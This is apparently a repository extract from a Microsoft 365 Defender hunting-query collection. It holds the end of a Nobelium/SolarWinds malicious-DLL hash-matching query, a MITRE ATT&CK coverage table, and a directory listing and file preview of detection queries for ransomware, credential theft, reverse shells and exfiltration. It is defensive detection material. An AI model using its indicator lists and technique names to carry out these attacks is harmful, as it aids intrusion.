| where SHA1 in ("76640508b1e7759e548771a5359eaed353bf1eec","d130bd75645c2433f88ac03e73395fba172ef676","1acf3108bf1e376c8848fbb25dc87424f2c2a39c","e257236206e99f5a5c62035c9c59c57206728b28","6fdd82b7ca1c1f0ec67c05b36d14c9517065353b","2f1a5a7411d015d01aaee4535835400191645023","bcb5a4dcbc60d26a5f619518f2cfc1b4bb4e4387","16505d0b929d80ad1680f993c02954cfd3772207","d8938528d68aabe1e31df485eb3f75c8a925b5d9","395da6d4f3c890295f7584132ea73d759bd9d094","c8b7f28230ea8fbf441c64fdd3feeba88607069e","2841391dfbffa02341333dd34f5298071730366a","2546b0e82aecfe987c318c7ad1d00f9fa11cd305","2dafddbfb0981c5aa31f27a298b9c804e553c7bc","e2152737bed988c0939c900037890d1244d9a30e","fd15760abfc0b2537b89adc65b1ff3f072e7e31c") or SHA256 in ("32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77","ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6","dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b","eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed","ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c","019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134","c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77","0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589","e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d","20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9","2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d","a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d","92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690","a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2","b8a05cc492f70ffa4adcd446b693d5aa2b71dc4fa2bf5022bf60d7b13884f666","cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6","ffdbdd460420972fd2926a7f460c198523480bc6279dd6cca177230db18748e8")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | v | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/locate-dll-loaded-in-memory[Nobelium].md
================================================
# Locate Nobelium-related malicious DLLs loaded in memory
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
gitextract_10u3qxy0/
├── .gitignore
├── 00-query-submission-template.md
├── CODE_OF_CONDUCT.md
├── Campaigns/
│ ├── APT Baby Shark.txt
│ ├── APT29 thinktanks.txt
│ ├── Abuse.ch Recent Threat Feed.md
│ ├── Abusing settingcontent-ms.txt
│ ├── Bazacall/
│ │ ├── Bazacall Emails.md
│ │ ├── Cobalt Strike Lateral Movement.md
│ │ ├── Dropping payload via certutil.md
│ │ ├── Excel Macro Execution.md
│ │ ├── Excel file download domain pattern.md
│ │ ├── Malicious Excel Delivery.md
│ │ ├── NTDS theft.md
│ │ ├── Renamed Rclone Exfil.md
│ │ └── RunDLL Suspicious Network Connection.md
│ ├── Bazarloader/
│ │ ├── Stolen Images Execution.md
│ │ ├── Zip-Doc - Creation of JPG Payload File.md
│ │ └── Zip-Doc - Word Launching MSHTA.md
│ ├── Bear Activity GTR 2019.txt
│ ├── Cloud Hopper.txt
│ ├── DofoilNameCoinServerTraffic.txt
│ ├── Dopplepaymer In-Memory Malware Implant.txt
│ ├── Dragon Fly.txt
│ ├── Elise backdoor.txt
│ ├── Equation Group C2 Communication.txt
│ ├── Hurricane Panda activity.txt
│ ├── Judgement Panda exfil activity.txt
│ ├── Jupyter-Solarmaker/
│ │ ├── deimos-component-execution.md
│ │ ├── evasive-powershell-executions.md
│ │ ├── evasive-powershell-strings.md
│ │ └── successive-tk-domain-calls.md
│ ├── LemonDuck/
│ │ ├── LemonDuck-competition-killer.md
│ │ ├── LemonDuck-component-download-structure.md
│ │ ├── LemonDuck-component-names.md
│ │ ├── LemonDuck-control-structure.md
│ │ ├── LemonDuck-defender-exclusions.md
│ │ ├── LemonDuck-email-subjects.md
│ │ ├── LemonDuck-id-generation.md
│ │ └── LemonDuck-registration-function.md
│ ├── Log4J/
│ │ ├── Alerts related to Log4j vulnerability.md
│ │ ├── Devices with Log4j vulnerability alerts and additional other alert related context.md
│ │ ├── Suspicious JScript staging comment.md
│ │ ├── Suspicious PowerShell curl flags.md
│ │ └── Suspicious process event creation from VMWare Horizon TomcatService.md
│ ├── MacOceanLotusBackdoor.txt
│ ├── MacOceanLotusDropper.txt
│ ├── Macaw Ransomware/
│ │ ├── Disable Controlled Folders.md
│ │ ├── Imminent Ransomware.md
│ │ ├── Inhibit recovery by disabling tools and functionality.md
│ │ ├── Mass account password change.md
│ │ ├── PSExec Attrib commands.md
│ │ └── Use of MSBuild as LOLBin.md
│ ├── OceanLotus registry activity.txt
│ ├── Qakbot/
│ │ ├── Excel launching anomalous processes.md
│ │ ├── General attempts to access local email store.md
│ │ ├── Qakbot Craigslist Domains.md
│ │ ├── Qakbot email theft.md
│ │ └── Qakbot reconnaissance activities.md
│ ├── Ransomware hits healthcare - Alternate Data Streams use.txt
│ ├── Ransomware hits healthcare - Backup deletion.txt
│ ├── Ransomware hits healthcare - Cipher.exe tool deleting data.txt
│ ├── Ransomware hits healthcare - Clearing of system logs.txt
│ ├── Ransomware hits healthcare - Possible compromised accounts.txt
│ ├── Ransomware hits healthcare - Robbinhood activity.txt
│ ├── Ransomware hits healthcare - Turning off System Restore.txt
│ ├── Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt
│ ├── StrRAT malware/
│ │ ├── StrRAT-AV-Discovery.md
│ │ ├── StrRAT-Email-Delivery.md
│ │ └── StrRAT-Malware-Persistence.md
│ ├── Sysrv-botnet/
│ │ ├── app-armor-stopped.md
│ │ ├── java-executing-cmd-to-run-powershell.md
│ │ ├── kinsing-miner-download.md
│ │ ├── oracle-webLogic-executing-powershell.md
│ │ ├── rce-on-vulnerable-server.md
│ │ └── tomcat-8-executing-powershell.md
│ ├── Threat actor Phosphorus masquerading as conference organizers.md
│ ├── WastedLocker Downloader.md
│ ├── ZLoader/
│ │ ├── Malicious bat file.md
│ │ ├── Payload Delivery.md
│ │ └── Suspicious Registry Keys.md
│ ├── apt sofacy zebrocy.txt
│ ├── apt sofacy.txt
│ ├── apt ta17 293a ps.txt
│ ├── apt tropictrooper.txt
│ ├── apt unidentified nov 18.txt
│ ├── c2-lookup-from-nonbrowser[Nobelium].md
│ ├── c2-lookup-response[Nobelium].md
│ ├── cobalt-strike-invoked-w-wmi.md
│ ├── compromised-certificate[Nobelium].md
│ ├── confluence-weblogic-targeted.md
│ ├── cypherpunk-exclusive-commands.md
│ ├── cypherpunk-remote-exec-w-psexesvc.md
│ ├── detect-cyzfc-activity.md
│ ├── fireeye-red-team-tools-CVEs [Nobelium].md
│ ├── fireeye-red-team-tools-HASHs [Nobelium].md
│ ├── known-affected-software-orion[Nobelium].md
│ ├── launching-base64-powershell[Nobelium].md
│ ├── launching-cmd-echo[Nobelium].md
│ ├── locate-dll-created-locally[Nobelium].md
│ ├── locate-dll-loaded-in-memory[Nobelium].md
│ ├── oceanlotus-apt32-files.md
│ ├── oceanlotus-apt32-network.md
│ ├── possible-affected-software-orion[Nobelium].md
│ ├── robbinhood-driver.md
│ ├── robbinhood-evasion.md
│ ├── snip3-aviation-targeting-emails.md
│ ├── snip3-detectsanboxie-function-call.md
│ ├── snip3-encoded-powershell-structure.md
│ ├── snip3-malicious-network-connectivity.md
│ └── snip3-revengerat-c2-exfiltration.md
├── Collection/
│ ├── Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md
│ ├── HostExportingMailboxAndRemovingExport[Solarigate].md
│ └── MailItemsAccessedTimeSeries[Solarigate].md
├── Command and Control/
│ ├── C2-NamedPipe.md
│ ├── Connection to Rare DNS Hosts.md
│ ├── DNSPattern [Nobelium].md
│ ├── Device network events w low count FQDN.txt
│ ├── EncodedDomainURL [Nobelium].md
│ ├── Tor.txt
│ ├── c2-bluekeep.md
│ ├── check-for-shadowhammer-activity-download-domain.md
│ ├── python-use-by-ransomware-macos.md
│ ├── recon-with-rundll.md
│ └── reverse-shell-ransomware-macos.md
├── Credential Access/
│ ├── Active Directory Sensitive Group Modifications.md
│ ├── Private Key Files.txt
│ ├── cobalt-strike.md
│ ├── doppelpaymer-procdump.md
│ ├── identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md
│ ├── lazagne.md
│ ├── logon-attempts-after-malicious-email.md
│ ├── procdump-lsass-credentials.md
│ ├── wadhrama-credential-dump.md
│ └── wdigest-caching.md
├── Defense evasion/
│ ├── ADFSDomainTrustMods[Nobelium].md
│ ├── Discovering potentially tampered devices [Nobelium].md
│ ├── MailPermissionsAddedToApplication[Nobelium].md
│ ├── PotentialMicrosoftDefenderTampering[Solarigate].md
│ ├── UpdateStsRefreshToken[Solorigate].md
│ ├── alt-data-streams.md
│ ├── clear-system-logs.md
│ ├── deleting-data-w-cipher-tool.md
│ ├── doppelpaymer-stop-services.md
│ ├── hiding-java-class-file.md
│ ├── locate-files-possibly-signed-by-fraudulent-ecc-certificates.md
│ ├── qakbot-campaign-process-injection.md
│ └── qakbot-campaign-self-deletion.md
├── Delivery/
│ ├── Doc attachment with link to download.txt
│ ├── Dropbox downloads linked from other site.txt
│ ├── Email link + download + SmartScreen warning.txt
│ ├── Gootkit-malware.md
│ ├── Open email link.txt
│ ├── Pivot from detections to related downloads.txt
│ ├── Qakbot Craigslist Domains.md
│ ├── detect-jscript-file-creation.md
│ └── powercat-download.md
├── Discovery/
│ ├── Detect-Not-Active-AD-User-Accounts.md
│ ├── DetectTorRelayConnectivity.md
│ ├── DetectTorrentUse.txt
│ ├── Discover hosts doing possible network scans.txt
│ ├── Enumeration of users & groups for lateral movement.txt
│ ├── MultipleLdaps.md
│ ├── MultipleSensitiveLdaps.md
│ ├── PasswordSearch.md
│ ├── PrevalentInteractiveLogons
│ ├── Roasting.md
│ ├── SMB shares discovery.txt
│ ├── SensitiveLdaps.md
│ ├── SuspiciousEnumerationUsingAdfind[Nobelium].md
│ ├── URL Detection.txt
│ ├── VulnComputers.md
│ ├── detect-nbtscan-activity.md
│ ├── detect-suspicious-commands-initiated-by-web-server-processes.md
│ ├── doppelpaymer.md
│ ├── qakbot-campaign-esentutl.md
│ └── qakbot-campaign-outlook.md
├── Email Queries/
│ ├── Appspot Phishing Abuse.md
│ ├── JNLP-File-Attachment.md
│ ├── PhishingEmailUrlRedirector.md
│ └── referral-phish-emails.md
├── Execution/
│ ├── Base64 Detector and Decoder.md
│ ├── Base64encodePEFile.txt
│ ├── Detect Encoded Powershell.md
│ ├── Detect PowerShell v2 Downgrade.md
│ ├── ExecuteBase64DecodedPayload.txt
│ ├── File Copy and Execution.md
│ ├── Malware_In_recyclebin.txt
│ ├── Masquerading system executable.txt
│ ├── Possible Ransomware Related Destruction Activity.md
│ ├── PowerShell downloads.txt
│ ├── PowershellCommand - uncommon commands on machine.txt
│ ├── PowershellCommand footprint.txt
│ ├── Webserver Executing Suspicious Applications.md
│ ├── check-for-shadowhammer-activity-implant.md
│ ├── detect-anomalous-process-trees.md
│ ├── detect-bluekeep-related-mining.md
│ ├── detect-doublepulsar-execution.md
│ ├── detect-exploitation-of-cve-2018-8653.md
│ ├── detect-malcious-use-of-msiexec.md
│ ├── detect-malicious-rar-extraction.md
│ ├── detect-office-products-spawning-wmic.md
│ ├── detect-suspicious-mshta-usage.md
│ ├── detect-web-server-exploit-doublepulsar.md
│ ├── exchange-iis-worker-dropping-webshell.md
│ ├── jse-launched-by-word.md
│ ├── launch-questd-w-osascript.md
│ ├── locate-shlayer-payload-decryption-activity.md
│ ├── locate-shlayer-payload-decrytion-activity.md
│ ├── locate-surfbuyer-downloader-decoding-activity.md
│ ├── office-apps-launching-wscipt.md
│ ├── powershell-activity-after-email-from-malicious-sender.md
│ ├── powershell-version-2.0-execution.md
│ ├── python-based-attacks-on-macos.md
│ ├── qakbot-campaign-suspicious-javascript.md
│ ├── reverse-shell-nishang-base64.md
│ ├── reverse-shell-nishang.md
│ ├── sql-server-abuse.md
│ ├── umworkerprocess-creating-webshell.md
│ └── umworkerprocess-unusual-subprocess-activity.md
├── Exfiltration/
│ ├── 7-zip-prep-for-exfiltration.md
│ ├── Anomaly of MailItemAccess by GraphAPI [Nobelium].md
│ ├── Data copied to other location than C drive.txt
│ ├── Files copied to USB drives.md
│ ├── MailItemsAccessed Throttling [Nobelium].md
│ ├── Map external devices.txt
│ ├── OAuth Apps accessing user mail via GraphAPI [Nobelium].md
│ ├── OAuth Apps reading mail both via GraphAPI and directly [Nobelium].md
│ ├── OAuth Apps reading mail via GraphAPI anomaly [Nobelium].md
│ ├── Password Protected Archive Creation.md
│ ├── Possible File Copy to USB Drive.md
│ ├── detect-archive-exfiltration-to-competitor.md
│ ├── detect-exfiltration-after-termination.md
│ ├── detect-steganography-exfiltration.md
│ └── exchange-powershell-snapin-loaded.md
├── Exploits/
│ ├── AcroRd-Exploits.txt
│ ├── CVE-2021-36934 usage detection.md
│ ├── Electron-CVE-2018-1000006.txt
│ ├── Flash-CVE-2018-4848.txt
│ ├── Linux-DynoRoot-CVE-2018-1111.txt
│ ├── MosaicLoader.md
│ ├── Print Spooler RCE/
│ │ ├── Spoolsv Spawning Rundll32.md
│ │ ├── Suspicious DLLs in spool folder.md
│ │ ├── Suspicious Spoolsv Child Process.md
│ │ └── Suspicious files in spool folder.md
│ ├── SolarWinds -CVE-2021-35211.md
│ ├── printnightmare-cve-2021-1675 usage detection.md
│ ├── winrar-cve-2018-20250-ace-files.md
│ └── winrar-cve-2018-20250-file-creation.md
├── Fun/
│ ├── EmojiHunt.txt
│ ├── HiddenMessage.txt
│ └── Make FolderPath Vogon Poetry.md
├── General queries/
│ ├── Alert Events from Internal IP Address.txt
│ ├── AppLocker Policy Design Assistant.md
│ ├── Baseline Comparison.txt
│ ├── Crashing Applications.md
│ ├── Detect Azure RemoteIP.md
│ ├── Device Count by DNS Suffix.md
│ ├── Device uptime calculation.md
│ ├── Endpoint Agent Health Status Report.md
│ ├── Events surrounding alert.txt
│ ├── Failed Logon Attempt.txt
│ ├── File footprint.txt
│ ├── Firewall Policy Design Assistant.md
│ ├── MD AV Signature and Platform Version.md
│ ├── MITRE - Suspicious Events.txt
│ ├── Machine info from IP address.txt
│ ├── Network footprint.txt
│ ├── Network info of machine.txt
│ ├── Phish and Malware received by user vs total amount of email.md
│ ├── Services.txt
│ ├── System Guard Security Level Baseline.txt
│ ├── System Guard Security Level Drop.txt
│ ├── insider-threat-detection-queries.md
│ └── wifikeys.txt
├── Impact/
│ ├── backup-deletion.md
│ ├── ransom-note-creation-macos.md
│ ├── turn-off-system-restore.md
│ └── wadhrama-data-destruction.md
├── Initial access/
│ ├── Check for Maalware Baazar (abuse.ch) hashes in your mail flow.md
│ ├── Non_intended_user_logon.md
│ ├── PhishingEmailUrlRedirector.md
│ ├── SuspiciousUrlClicked.md
│ ├── WhenZAPed.md
│ ├── detect-bluekeep-exploitation-attempts.md
│ ├── detect-mailsniper.md
│ ├── files-from-malicious-sender.md
│ ├── identify-potential-missed-phishing-email-campaigns.md
│ └── jar-attachments.md
├── LICENSE
├── Lateral Movement/
│ ├── Account brute force.txt
│ ├── Device Logons from Unknown IPs.txt
│ ├── ImpersonatedUserFootprint.md
│ ├── Network Logons with Local Accounts.md
│ ├── Non-local logons with -500 account.txt
│ ├── ServiceAccountsPerformingRemotePS.txt
│ ├── detect-suspicious-rdp-connections.md
│ ├── doppelpaymer-psexec.md
│ └── remote-file-creation-with-psexec.md
├── M365-PowerBi Dashboard/
│ ├── Microsoft Threat Protection - API Dashboard.pbit
│ └── readme.txt
├── Network/
│ └── Defender for Endpoint Telemetry.txt
├── Notebooks/
│ ├── M365D APIs ep3.ipynb
│ ├── WDATP APIs Demo Notebook.ipynb
│ └── mtp_hunting.ipynb
├── Persistence/
│ ├── Accessibility Features.txt
│ ├── AddedCredentialFromContryXAndSigninFromCountryY.md
│ ├── Create account.txt
│ ├── CredentialsAddAfterAdminConsentedToApp[Nobelium].md
│ ├── LocalAdminGroupChanges.txt
│ ├── NewAppOrServicePrincipalCredential[Nobelium].md
│ ├── Possible webshell drop.md
│ ├── detect-prifou-pua.md
│ ├── localAdminAccountLogon.txt
│ ├── qakbot-campaign-registry-edit.md
│ ├── scheduled task creation.txt
│ └── wadhrama-ransomware.md
├── Privilege escalation/
│ ├── Add uncommon credential type to application [Nobelium].md
│ ├── SAM-Name-Changes-CVE-2021-42278.md
│ ├── ServicePrincipalAddedToRole [Nobelium].md
│ ├── cve-2019-0808-c2.md
│ ├── cve-2019-0808-nufsys-file creation.md
│ ├── cve-2019-0808-set-scheduled-task.md
│ ├── dell-driver-vulnerability-2021.md
│ ├── detect-cve-2019-0863-AngryPolarBearBug2-exploit.md
│ ├── detect-cve-2019-0973-installerbypass-exploit.md
│ ├── detect-cve-2019-1053-sandboxescape-exploit.md
│ ├── detect-cve-2019-1069-bearlpe-exploit.md
│ ├── detect-cve-2019-1129-byebear-exploit.md
│ └── locate-ALPC-local-privilege-elevation-exploit.md
├── Protection events/
│ ├── AV Detections with Source.txt
│ ├── AV Detections with USB Disk Drive.txt
│ ├── Antivirus detections.txt
│ ├── ExploitGuardASRStats.txt
│ ├── ExploitGuardAsrDescriptions.txt
│ ├── ExploitGuardBlockOfficeChildProcess.txt
│ ├── ExploitGuardControlledFolderAccess.txt
│ ├── ExploitGuardNetworkProtectionEvents.txt
│ ├── ExploitGuardStats.txt
│ ├── PUA ThreatName per Computer.txt
│ ├── README.md
│ ├── SmartScreen URL block ignored by user.txt
│ ├── SmartScreen app block ignored by user.txt
│ ├── Windows filtering events (Firewall).txt
│ └── WindowsDefenderAVEvents.txt
├── README.md
├── Ransomware/
│ ├── Backup deletion.md
│ ├── Check for multiple signs of ransomware activity.md
│ ├── Clearing of forensic evidence from event logs using wevtutil.md
│ ├── DarkSide.md
│ ├── Deletion of data on multiple drives using cipher exe.md
│ ├── Discovery for highly-privileged accounts.md
│ ├── Distribution from remote location.md
│ ├── Fake Replies.md
│ ├── File Backup Deletion Alerts.md
│ ├── Gootkit File Delivery.md
│ ├── HTA Startup Persistence.md
│ ├── IcedId Delivery.md
│ ├── IcedId attachments.md
│ ├── IcedId email delivery.md
│ ├── LaZagne Credential Theft.md
│ ├── Potential ransomware activity related to Cobalt Strike.md
│ ├── Qakbot discovery activies.md
│ ├── Sticky Keys.md
│ ├── Stopping multiple processes using taskkill.md
│ ├── Stopping processes using net stop.md
│ ├── Suspicious Bitlocker Encryption.md
│ ├── Suspicious Google Doc Links.md
│ ├── Suspicious Image Load related to IcedId.md
│ ├── Turning off System Restore.md
│ └── Turning off services using sc exe.md
├── SECURITY.md
├── TVM/
│ └── devices_with_vuln_and_users_received_payload.md
├── Troubleshooting/
│ ├── Connectivity Failures by Device.md
│ └── Connectivity Failures by Domain.md
└── Webcasts/
├── Airlift 2021 - Lets Invoke.csl
├── Ignite 2020 - Best practices for hunting across domains with Microsoft 365 Defender.txt
├── README.md
├── TrackingTheAdversary/
│ ├── Episode 1 - KQL Fundamentals.txt
│ ├── Episode 2 - Joins.txt
│ ├── Episode 3 - Summarizing, Pivoting, and Joining.txt
│ ├── Episode 4 - Lets Hunt.txt
│ └── README.md
└── l33tSpeak/
├── MCAS - The Hunt.txt
├── Performance, Json and dynamics operator, external data.txt
└── l33tspeak 11 Oct 2021 - externaldata and query partitioning.csl
Condensed preview — 386 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (6,416K chars).
[
{
"path": ".gitignore",
"chars": 4832,
"preview": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## G"
},
{
"path": "00-query-submission-template.md",
"chars": 981,
"preview": "# < Insert query name >\n< Provide query description and usage tips >\n## Query\n```\n< Insert query string here >\n```\n## Ca"
},
{
"path": "CODE_OF_CONDUCT.md",
"chars": 444,
"preview": "# Microsoft Open Source Code of Conduct\n\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://op"
},
{
"path": "Campaigns/APT Baby Shark.txt",
"chars": 468,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml\n// Questions via Twitte"
},
{
"path": "Campaigns/APT29 thinktanks.txt",
"chars": 278,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml\n// Questions via"
},
{
"path": "Campaigns/Abuse.ch Recent Threat Feed.md",
"chars": 3301,
"preview": "# Abuse.ch Recent Threat Feed\n\nThis query will hunt for files matching the current abuse.ch recent threat feed based on "
},
{
"path": "Campaigns/Abusing settingcontent-ms.txt",
"chars": 761,
"preview": "// Sample query that search for .settingcontent-ms that has been downloaded from the web\n// through Microsoft Edge, Inte"
},
{
"path": "Campaigns/Bazacall/Bazacall Emails.md",
"chars": 1755,
"preview": "# Bazacall emails\nBazacall malware uses emails that contain a phone number for the user to call in order to cancel a fak"
},
{
"path": "Campaigns/Bazacall/Cobalt Strike Lateral Movement.md",
"chars": 1409,
"preview": "# Bazacall Cobalt Strike Lateral Movement\nMicrosoft has observed Bazacall using Cobalt Strike in order to move laterally"
},
{
"path": "Campaigns/Bazacall/Dropping payload via certutil.md",
"chars": 1461,
"preview": "# BazaCall dropping payload via certutil.exe\n\nBazaCall is a campaign that manipulate users into calling a customer suppo"
},
{
"path": "Campaigns/Bazacall/Excel Macro Execution.md",
"chars": 1109,
"preview": "# Bazacall Excel Macro Execution\nBazacall uses malicious macro-enabled Excel documents to execute their payload. \n\n## Qu"
},
{
"path": "Campaigns/Bazacall/Excel file download domain pattern.md",
"chars": 1344,
"preview": "# BazaCall Excel file download domain pattern\n\nBazaCall is a campaign that manipulate users into calling a customer supp"
},
{
"path": "Campaigns/Bazacall/Malicious Excel Delivery.md",
"chars": 1185,
"preview": "# Bazacall Malicious Excel Delivery\nBazacall uses malicious Excel files to execute payloads on affected devices. \n\n## Qu"
},
{
"path": "Campaigns/Bazacall/NTDS theft.md",
"chars": 1291,
"preview": "# Bazacall NTDS.dit Theft\nMicrosoft has observed compromises related to Bazacall resulting in theft of the Active Direct"
},
{
"path": "Campaigns/Bazacall/Renamed Rclone Exfil.md",
"chars": 1096,
"preview": "# Bazacall Renamed Rclone for Exfiltration\nMicrosoft has observed Bazacall using a renamed version of Rclone for data ex"
},
{
"path": "Campaigns/Bazacall/RunDLL Suspicious Network Connection.md",
"chars": 1428,
"preview": "# RunDLL Suspicious Network Connections\nDuring the chain of events from Bazacall to Bazaloader, RunDLL makes several net"
},
{
"path": "Campaigns/Bazarloader/Stolen Images Execution.md",
"chars": 1244,
"preview": "# Stolen Images\nThe \"Stolen Images\" Bazarloader campaign uses fake copyright infingement contact form emails and malicio"
},
{
"path": "Campaigns/Bazarloader/Zip-Doc - Creation of JPG Payload File.md",
"chars": 1375,
"preview": "# Zip-Doc - Creation of JPG Payload File\nIn the campaign where Bazarloader is delivered via emails containing pw protect"
},
{
"path": "Campaigns/Bazarloader/Zip-Doc - Word Launching MSHTA.md",
"chars": 1231,
"preview": "# Zip-Doc - Word Launching MSHTA\nThe pw protected zip attachment -> Word doc delivery method of Bazarloader utilizes Wor"
},
{
"path": "Campaigns/Bear Activity GTR 2019.txt",
"chars": 407,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml\n// Questions "
},
{
"path": "Campaigns/Cloud Hopper.txt",
"chars": 297,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml\n// Questions via Twit"
},
{
"path": "Campaigns/DofoilNameCoinServerTraffic.txt",
"chars": 812,
"preview": "// This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers\r\n// The full article is"
},
{
"path": "Campaigns/Dopplepaymer In-Memory Malware Implant.txt",
"chars": 455,
"preview": "///////////////////////////////////////////////////////////////////\n// Dopplepaymer In-Memory Malware Implant\n//\n// This"
},
{
"path": "Campaigns/Dragon Fly.txt",
"chars": 257,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml\n// Questions via Twitte"
},
{
"path": "Campaigns/Elise backdoor.txt",
"chars": 432,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml\n// Questions via Twitter: @"
},
{
"path": "Campaigns/Equation Group C2 Communication.txt",
"chars": 366,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml\n// Questions via"
},
{
"path": "Campaigns/Hurricane Panda activity.txt",
"chars": 345,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml\n// Questions via "
},
{
"path": "Campaigns/Judgement Panda exfil activity.txt",
"chars": 697,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml\n// Question"
},
{
"path": "Campaigns/Jupyter-Solarmaker/deimos-component-execution.md",
"chars": 1823,
"preview": "# Jupyter AKA SolarMarker\nJupyter, otherwise known as SolarMarker, is a malware family and cluster of components known f"
},
{
"path": "Campaigns/Jupyter-Solarmaker/evasive-powershell-executions.md",
"chars": 1794,
"preview": "# Jupyter AKA SolarMarker\nJupyter, otherwise known as SolarMarker, is a malware family and cluster of components known f"
},
{
